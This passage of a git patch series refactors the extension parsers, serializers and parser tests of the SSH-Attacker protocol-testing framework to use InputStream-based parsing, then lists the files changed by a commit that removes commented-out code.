LOGGER.debug("Extension name length: {}", extension.getNameLength().getValue()); - extension.setName( + abstractExtension.setName( parseByteString(extension.getNameLength().getValue(), StandardCharsets.US_ASCII)); LOGGER.debug("Extension name: {}", extension.getName().getValue()); } - protected abstract void parseExtensionValue(); + protected abstract void parseExtensionValue(E AbstractExtension); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParser.java index eb4501bad..ced43369b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.DelayCompressionExtension; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,13 +19,22 @@ public class DelayCompressionExtensionParser private static final Logger LOGGER = LogManager.getLogger(); + public DelayCompressionExtensionParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(DelayCompressionExtension delayCompressionExtension) { + parseExtensionData(delayCompressionExtension); + } + /* public DelayCompressionExtensionParser(byte[] array) { super(array); } public DelayCompressionExtensionParser(byte[] array, int startPosition) { super(array, startPosition); - } + }*/ @Override protected DelayCompressionExtension createExtension() { @@ -32,13 +42,13 @@ protected DelayCompressionExtension createExtension() { } @Override - protected void parseExtensionValue() { - parseCompressionMethodsLength(); - parseCompressionMethodsClientToServer(); - parseCompressionMethodsServerToClient(); + protected void parseExtensionValue(DelayCompressionExtension extension) { + parseCompressionMethodsLength(extension); + parseCompressionMethodsClientToServer(extension); + parseCompressionMethodsServerToClient(extension); } - private void parseCompressionMethodsLength() { + private void parseCompressionMethodsLength(DelayCompressionExtension extension) { extension.setCompressionMethodsLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -46,7 +56,7 @@ private void parseCompressionMethodsLength() { extension.getCompressionMethodsLength().getValue()); } - private void parseCompressionMethodsClientToServer() { + private void parseCompressionMethodsClientToServer(DelayCompressionExtension extension) { extension.setCompressionMethodsClientToServerLength( parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug( @@ -61,7 +71,7 @@ private void parseCompressionMethodsClientToServer() { extension.getCompressionMethodsClientToServer().getValue()); } - private void parseCompressionMethodsServerToClient() { + private void parseCompressionMethodsServerToClient(DelayCompressionExtension extension) { extension.setCompressionMethodsServerToClientLength( parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/PingExtensionParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/PingExtensionParser.java index ac5955805..2a6984e74 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/PingExtensionParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/PingExtensionParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.PingExtension; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -16,31 +17,42 @@ public class PingExtensionParser extends AbstractExtensionParser private static final Logger LOGGER = LogManager.getLogger(); - public PingExtensionParser(byte[] array) { - super(array); + public PingExtensionParser(InputStream stream) { + super(stream); } - public PingExtensionParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(PingExtension pingExtension) { + parseExtensionData(pingExtension); } + /* + public PingExtensionParser(byte[] array) { + super(array); + } + + public PingExtensionParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + @Override protected PingExtension createExtension() { return new PingExtension(); } @Override - protected void parseExtensionValue() { - parseVersionLength(); - parseVersion(); + protected void parseExtensionValue(PingExtension extension) { + parseVersionLength(extension); + parseVersion(extension); } - private void parseVersionLength() { + private void parseVersionLength(PingExtension extension) { extension.setVersionLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Version length: {}", extension.getVersionLength().getValue()); } - private void parseVersion() { + private void parseVersion(PingExtension extension) { extension.setVersion(parseByteString(extension.getVersionLength().getValue())); LOGGER.debug("Version: {}", extension.getVersion().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParser.java index 009ed503e..ea3ee5271 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.ServerSigAlgsExtension; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,13 +18,22 @@ public class ServerSigAlgsExtensionParser extends AbstractExtensionParser extension - .getHandler(chooser.getContext().getSshContext()) - .getPreparator() + .getPreparator(chooser.getContext().getSshContext()) .prepare()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ExtensionInfoMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ExtensionInfoMessageSerializer.java index 98e3861dd..04317088d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ExtensionInfoMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ExtensionInfoMessageSerializer.java @@ -28,10 +28,7 @@ private void serializeExtensionCount() { private void serializeExtensions() { message.getExtensions() - .forEach( - extension -> - appendBytes( - extension.getHandler(null).getSerializer().serialize())); + .forEach(extension -> appendBytes(extension.getSerializer(null).serialize())); } @Override diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParserTest.java index 9060c547d..7c680e610 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/DelayCompressionExtensionParserTest.java @@ -11,6 +11,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.DelayCompressionExtension; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -73,8 +74,11 @@ public void testParse( String expectedCompressionMethodsClientToServer, int expectedCompressionMethodsServerToClientLength, String expectedCompressionMethodsServerToClient) { - DelayCompressionExtensionParser parser = new DelayCompressionExtensionParser(providedBytes); - DelayCompressionExtension extension = parser.parse(); + DelayCompressionExtension extension = new DelayCompressionExtension(); + extension.getParser(null, new ByteArrayInputStream(providedBytes)).parse(extension); + // DelayCompressionExtensionParser parser = new DelayCompressionExtensionParser(new + // ByteArrayInputStream(providedBytes)); + // DelayCompressionExtension extension = parser.parse(); assertEquals(expectedNameLength, extension.getNameLength().getValue()); assertEquals(expectedName, extension.getName().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParserTest.java index b2955d5fc..03271ba4b 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/extension/ServerSigAlgsExtensionParserTest.java @@ -11,6 +11,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.ServerSigAlgsExtension; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -57,8 +58,10 @@ public void testParse( String expectedName, int expectedValueLength, String expectedValue) { - ServerSigAlgsExtensionParser parser = new ServerSigAlgsExtensionParser(providedBytes); - ServerSigAlgsExtension extension = parser.parse(); + ServerSigAlgsExtension extension = new ServerSigAlgsExtension(); + extension.getParser(null, new ByteArrayInputStream(providedBytes)).parse(extension); + /* ServerSigAlgsExtensionParser parser = new ServerSigAlgsExtensionParser(providedBytes); + ServerSigAlgsExtension extension = parser.parse();*/ assertEquals(expectedNameLength, extension.getNameLength().getValue().intValue()); assertEquals(expectedName, extension.getName().getValue()); From 94e3f90530a178f74e4127bed90d847369f52805 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Mar 2024 22:52:12 +0100 Subject: [PATCH 166/176] Cleanup commented code --- .idea/misc.xml | 3 +- .../attacks/general/KeyFetcher.java | 21 ---- .../delegate/ProtocolVersionDelegate.java | 10 -- .../core/constants/MessageIdConstantSSH1.java | 24 ---- .../SpecificReceiveLayerConfiguration.java | 6 - .../core/layer/impl/SSH1Layer.java | 6 +- .../core/packet/cipher/PacketCipher.java | 4 - .../handler/UserAuthBannerMessageHandler.java | 27 ---- .../UserAuthFailureMessageHandler.java | 4 - .../UserAuthHostbasedMessageHandler.java | 4 - .../UserAuthInfoRequestMessageHandler.java | 5 - .../UserAuthInfoResponseMessageHandler.java | 5 - ...AuthKeyboardInteractiveMessageHandler.java | 4 - .../handler/UserAuthNoneMessageHandler.java | 4 - .../UserAuthPasswordMessageHandler.java | 4 - .../handler/UserAuthPkOkMessageHandler.java | 4 - .../handler/UserAuthPubkeyMessageHandler.java | 4 - .../UserAuthSuccessMessageHandler.java | 4 - .../UserAuthUnknownMessageHandler.java | 4 - .../common/ProtocolMessageHandler.java | 7 -- .../protocol/common/SshMessageHandler.java | 6 - .../ChannelOpenUnknownMessageHandler.java | 26 ---- ...ChannelRequestAuthAgentMessageHandler.java | 25 ---- .../ChannelRequestBreakMessageHandler.java | 25 ---- .../ChannelRequestEnvMessageHandler.java | 24 ---- .../ChannelRequestExecMessageHandler.java | 25 ---- ...hannelRequestExitSignalMessageHandler.java | 25 ---- ...hannelRequestExitStatusMessageHandler.java | 25 ---- .../ChannelRequestPtyMessageHandler.java | 24 ---- .../ChannelRequestShellMessageHandler.java | 25 ---- .../ChannelRequestSignalMessageHandler.java | 25 ---- ...ChannelRequestSubsystemMessageHandler.java | 25 ---- .../ChannelRequestUnknownMessageHandler.java | 25 ---- ...nnelRequestWindowChangeMessageHandler.java | 25 ---- .../ChannelRequestX11MessageHandler.java | 24 ---- .../ChannelRequestXonXoffMessageHandler.java | 25 ---- .../handler/ChannelSuccessMessageHandler.java | 24 ---- .../ChannelWindowAdjustMessageHandler.java | 25 ---- ...questCancelTcpIpForwardMessageHandler.java | 26 ---- .../GlobalRequestFailureMessageHandler.java | 25 ---- ...alRequestNoMoreSessionsMessageHandler.java | 25 ---- ...lRequestOpenSshHostKeysMessageHandler.java | 26 ---- .../GlobalRequestSuccessMessageHandler.java | 26 ---- ...obalRequestTcpIpForwardMessageHandler.java | 26 ---- .../GlobalRequestUnknownMessageHandler.java | 25 ---- .../message/ChannelWindowAdjustMessage.java | 5 - .../ChannelOpenSessionMessageParser.java | 13 -- .../ChannelOpenUnknownMessageParser.java | 15 --- .../ChannelRequestAuthAgentMessageParser.java | 14 --- .../ChannelRequestBreakMessageParser.java | 14 --- .../ChannelRequestEnvMessageParser.java | 16 --- .../ChannelRequestExecMessageParser.java | 16 --- ...ChannelRequestExitSignalMessageParser.java | 16 --- ...ChannelRequestExitStatusMessageParser.java | 15 --- .../parser/ChannelRequestMessageParser.java | 9 -- .../ChannelRequestPtyMessageParser.java | 14 --- .../ChannelRequestShellMessageParser.java | 11 -- .../ChannelRequestSignalMessageParser.java | 14 --- .../ChannelRequestSubsystemMessageParser.java | 16 --- .../ChannelRequestUnknownMessageParser.java | 16 --- ...annelRequestWindowChangeMessageParser.java | 16 --- .../ChannelRequestX11MessageParser.java | 16 --- .../ChannelRequestXonXoffMessageParser.java | 16 --- .../parser/ChannelSuccessMessageParser.java | 15 --- .../ChannelWindowAdjustMessageParser.java | 16 --- ...equestCancelTcpIpForwardMessageParser.java | 12 -- .../GlobalRequestFailureMessageParser.java | 16 --- .../parser/GlobalRequestMessageParser.java | 9 -- ...balRequestNoMoreSessionsMessageParser.java | 16 --- ...alRequestOpenSshHostKeysMessageParser.java | 16 --- .../GlobalRequestSuccessMessageParser.java | 16 --- ...lobalRequestTcpIpForwardMessageParser.java | 17 --- .../GlobalRequestUnknownMessageParser.java | 14 --- .../handler/DisconnectMessageHandler.java | 6 - .../ssh1/handler/EofMessageSSHV1Handler.java | 5 - .../handler/ExecCmdMessageSSHV1Handler.java | 5 - .../ExitConfirmationMessageSSHV1Handler.java | 5 - .../StderrDataMessageSSHV1Handler.java | 6 - .../handler/StdinDataMessageSSHV1Handler.java | 6 - .../StdoutDataMessageSSHV1Handler.java | 6 - .../ssh1/handler/SuccessMessageHandler.java | 5 - .../parser/ClientSessionKeyMessageParser.java | 110 ----------------- .../ssh1/parser/DisconnectMessageParser.java | 115 ------------------ .../parser/ServerPublicKeyMessageParser.java | 100 --------------- .../ServerPublicKeyMessagePreparator.java | 7 -- .../handler/DebugMessageHandler.java | 24 ---- .../DhGexKeyExchangeGroupMessageHandler.java | 25 ---- .../DhGexKeyExchangeInitMessageHandler.java | 26 ---- ...exKeyExchangeOldRequestMessageHandler.java | 26 ---- .../DhGexKeyExchangeReplyMessageHandler.java | 25 ---- ...DhGexKeyExchangeRequestMessageHandler.java | 26 ---- .../DhKeyExchangeInitMessageHandler.java | 24 ---- .../DhKeyExchangeReplyMessageHandler.java | 24 ---- .../handler/DisconnectMessageHandler.java | 24 ---- .../EcdhKeyExchangeInitMessageHandler.java | 25 ---- .../EcdhKeyExchangeReplyMessageHandler.java | 25 ---- .../HybridKeyExchangeInitMessageHandler.java | 39 ------ .../HybridKeyExchangeReplyMessageHandler.java | 37 ------ .../handler/IgnoreMessageHandler.java | 24 ---- .../KeyExchangeInitMessageHandler.java | 24 ---- .../handler/NewCompressMessageHandler.java | 24 ---- .../handler/NewKeysMessageHandler.java | 24 ---- .../transport/handler/PingMessageHandler.java | 24 ---- .../transport/handler/PongMessageHandler.java | 24 ---- .../RsaKeyExchangeDoneMessageHandler.java | 24 ---- .../RsaKeyExchangePubkeyMessageHandler.java | 27 ---- .../RsaKeyExchangeSecretMessageHandler.java | 26 ---- .../handler/ServiceAcceptMessageHandler.java | 24 ---- .../handler/ServiceRequestMessageHandler.java | 24 ---- .../handler/UnimplementedMessageHandler.java | 24 ---- .../handler/UnknownMessageHandler.java | 24 ---- .../VersionExchangeMessageHandler.java | 24 ---- .../message/HybridKeyExchangeInitMessage.java | 10 -- .../HybridKeyExchangeReplyMessage.java | 7 -- .../transport/message/IgnoreMessage.java | 5 - .../transport/parser/DebugMessageParser.java | 9 -- .../DhGexKeyExchangeGroupMessageParser.java | 13 -- .../DhGexKeyExchangeInitMessageParser.java | 14 --- ...GexKeyExchangeOldRequestMessageParser.java | 14 --- .../DhGexKeyExchangeReplyMessageParser.java | 14 --- .../DhGexKeyExchangeRequestMessageParser.java | 13 -- .../DhKeyExchangeInitMessageParser.java | 14 --- .../DhKeyExchangeReplyMessageParser.java | 16 --- .../parser/DisconnectMessageParser.java | 17 --- .../EcdhKeyExchangeInitMessageParser.java | 13 -- .../EcdhKeyExchangeReplyMessageParser.java | 14 --- .../parser/ExtensionInfoMessageParser.java | 9 -- .../HybridKeyExchangeInitMessageParser.java | 61 +++------- .../HybridKeyExchangeReplyMessageParser.java | 70 +++-------- .../transport/parser/IgnoreMessageParser.java | 15 --- .../parser/KeyExchangeInitMessageParser.java | 17 --- .../parser/NewCompressMessageParser.java | 9 -- .../parser/NewKeysMessageParser.java | 21 +--- .../transport/parser/PingMessageParser.java | 11 -- .../transport/parser/PongMessageParser.java | 11 -- .../RsaKeyExchangeDoneMessageParser.java | 16 --- .../RsaKeyExchangePubkeyMessageParser.java | 16 --- .../RsaKeyExchangeSecretMessageParser.java | 15 --- .../parser/ServiceAcceptMessageParser.java | 17 --- .../parser/ServiceRequestMessageParser.java | 13 -- .../parser/UnimplementedMessageParser.java | 17 --- .../parser/UnknownMessageParser.java | 17 --- .../parser/VersionExchangeMessageParser.java | 13 -- .../DelayCompressionExtensionParser.java | 8 -- .../parser/extension/PingExtensionParser.java | 10 -- .../ServerSigAlgsExtensionParser.java | 8 -- .../extension/UnknownExtensionParser.java | 9 -- ...hGexKeyExchangeReplyMessageSerializer.java | 6 - .../core/workflow/WorkflowTraceUtil.java | 22 ---- .../action/ForwardMessagesAction.java | 4 - .../core/workflow/action/ReceiveAction.java | 16 +-- .../DelayCompressionExtensionParserTest.java | 3 - .../ServerSigAlgsExtensionParserTest.java | 2 - .../sshattacker/server/main/SshServer.java | 8 -- 154 files changed, 40 insertions(+), 2804 deletions(-) diff --git a/.idea/misc.xml b/.idea/misc.xml index 28cbf2a5f..762cc98bf 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -12,7 +12,6 @@ -